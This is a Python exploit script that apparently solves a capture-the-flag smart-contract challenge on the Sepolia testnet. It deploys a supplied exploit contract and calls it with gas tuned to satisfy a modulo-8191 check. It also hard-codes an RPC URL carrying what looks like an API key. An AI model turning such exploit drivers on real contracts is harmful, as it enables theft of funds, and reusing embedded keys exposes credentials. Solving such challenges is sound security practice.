#!/usr/bin/env python3

import sys
from ethtools.pwn.prelude import *

#!/usr/bin/env python3

from web3 import Web3
from time import sleep

from ethpwn import context
from ethpwn.contract_metadata import CONTRACT_METADATA
from ethpwn.transactions import transact

import argparse

def parse_value(s):
    if s.strip().endswith('ether'):
        return Web3.to_wei(s.strip()[:-5].strip(), 'ether')
    elif s.strip().endswith('gwei'):
        return Web3.to_wei(s.strip()[:-4].strip(), 'gwei')
    else:
        return int(s)

parser = argparse.ArgumentParser()
parser.add_argument('exploit_contract_source', type=str)
parser.add_argument('proxy_addr', type=str)
parser.add_argument('--wallet', type=str, default='Laptop CTF Metamask', help="Wallet to use for the exploit transaction")
ARGS = parser.parse_args()

MY_WALLET = get_wallet(ARGS.wallet)
assert MY_WALLET is not None

context.log_level = 'DEBUG'

context.connect_http('https://sepolia.infura.io/v3/7358ed45ca2643de9e4b63848de2e3a8')
context.default_from_addr = MY_WALLET.address
context.default_signing_key = MY_WALLET.private_key

CONTRACT_METADATA.add_contracts_from_solidity_files([ARGS.exploit_contract_source])

gas_consumed_by_gas_instruction = (1978936-1941780) + 2# (+2) if the gas is returned as if the instruction had already executed
too_much = gas_consumed_by_gas_instruction % 8191
full_gas = 1978936 + (8191 - too_much)  + 103 + 3

with CONTRACT_METADATA['Exploit'].deploy_destructible(ARGS.proxy_addr) as (tx_hash, target):

    transact(target.functions.exploit(), gas=full_gas, force=True)
